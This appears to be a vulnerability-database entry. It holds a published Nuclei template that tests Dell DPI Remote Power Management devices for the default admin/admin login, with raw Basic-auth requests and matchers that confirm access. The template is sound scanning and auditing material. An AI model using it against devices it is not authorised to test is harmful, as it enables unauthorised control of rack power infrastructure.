漏洞描述
The Dell Metered Rack Power Distribution Unit uses a default username and password which is widely known, and any user could change the default password with access.
dell-dpi-default-login: Dell DPI Remote Power Management - Default Login
PoC代码[已公开]
id: dell-dpi-default-login
info:
name: Dell DPI Remote Power Management - Default Login
author: megamansec
severity: medium
description: |
The Dell Metered Rack Power Distribution Unit uses a default username and password which is widely known, and any user could change the default password with access.
reference:
- https://dl.dell.com/manuals/all-products/esuprt_ser_stor_net/esuprt_rack_infrastructure/dell-metered-pdu_user%27s%20guide3_en-us.pdf
classification:
cwe-id: CWE-798
metadata:
max-request: 2
tags: dell,dpi,rpm,default-login,vuln
variables:
str: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /index2.html HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64('{{username}}:{{password}}')}}
- |
POST /index2.html HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64('{{str}}:{{str}}')}}
payloads:
username:
- admin
password:
- admin
attack: pitchfork
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && status_code_2 == 401'
- 'contains(body_2, "Unauthorized")'
- '!contains(body_1, "/index.html")'
- 'contains_any(tolower(body_1), "<TITLE>DELL DPI Remote Power Management", "title=\"DELL DPI Remote Power Management")'
condition: and
# digest: 4a0a0047304502202e643445d559777c49121dd9608565a578d27e3e380b7fbde83c5e8d06a5c4e6022100ecffa08c33405eefd54e38a22dfec74968f04a8a59f69022c5211cbc6559d8f0:922c64590222798bb761d5b6d8e72950